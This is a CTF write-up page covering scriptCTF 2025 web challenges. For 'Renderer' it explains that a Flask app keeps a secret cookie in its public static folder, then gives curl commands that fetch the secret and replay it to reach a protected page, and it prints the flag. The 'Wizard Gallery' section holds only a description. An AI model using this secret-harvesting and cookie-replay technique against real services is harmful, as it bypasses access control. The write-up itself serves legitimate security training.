> For the complete documentation index, see [llms.txt](https://thienguen.gitbook.io/ctf-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://thienguen.gitbook.io/ctf-writeups/ctf/2025/scriptctf/web.md).

# web

## Challenges

### Renderer

<figure><img src="/files/RPlfiZL1Sii9XnYhgNxM" alt=""><figcaption></figcaption></figure>

> Introducing Renderer! A free-to-use app to render your images!
>
> * [chall.zip](https://storage.googleapis.com/scriptctf_challenges/Web/Renderer/chall.zip)

```
 unzip -l chall.zip
Archive:  chall.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1790  2025-07-21 08:39   app.py
        0  2025-07-18 10:31   templates/
      380  2025-07-18 10:31   templates/upload.html
      390  2025-07-18 10:49   templates/display.html
        0  2025-07-18 10:38   static/
        0  2025-07-21 08:37   static/uploads/
        0  2025-07-21 08:41   static/uploads/secrets/
        0  2025-07-21 08:41   static/uploads/secrets/secret_cookie.txt
       20  2025-07-21 08:42   flag.txt
---------                     -------
     2580                     9 files
```

<figure><img src="/files/IPoE78ih7PohrXZhDRL0" alt=""><figcaption></figcaption></figure>

Read a "secret" file that's stored in a directory that Flask automatically exposes via static file serving.&#x20;

1. Storing secrets in the static/ directory (which Flask serves publicly)
2. Not implementing proper access control

<pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong># Step 1: Trigger secret generation (this will fail but create the secret)
</strong>curl "http://play.scriptsorcerers.xyz:10188/developer"

# Step 2: IMMEDIATELY read the newly generated secret
SECRET=$(curl -s "http://play.scriptsorcerers.xyz:10188/static/uploads/secrets/secret_cookie.txt")

# Step 3: Use the secret before it gets regenerated
curl -H "Cookie: developer_secret_cookie=$SECRET" "http://play.scriptsorcerers.xyz:10188/developer"
</code></pre>

<figure><img src="/files/sdGHeBJ7StYxnRFF6QfB" alt=""><figcaption></figcaption></figure>

* <mark style="color:blue;">`scriptCTF{my_c00k135_4r3_n0t_s4f3!_edd23d3198a4}`</mark>

### Wizard Gallery

<figure><img src="/files/7iKAfVKtKRxzdw1TcY0A" alt=""><figcaption></figcaption></figure>

> The council's top priority is to protect the flag, no matter the cost. Oh hey look, it's a photo gallery. What could go wrong?
>
> * [Wizard-Gallery.zip](https://storage.googleapis.com/scriptctf_challenges/Web/Wizard-Gallery/Wizard-Gallery.zip)

{% hint style="info" %}
breh
{% endhint %}
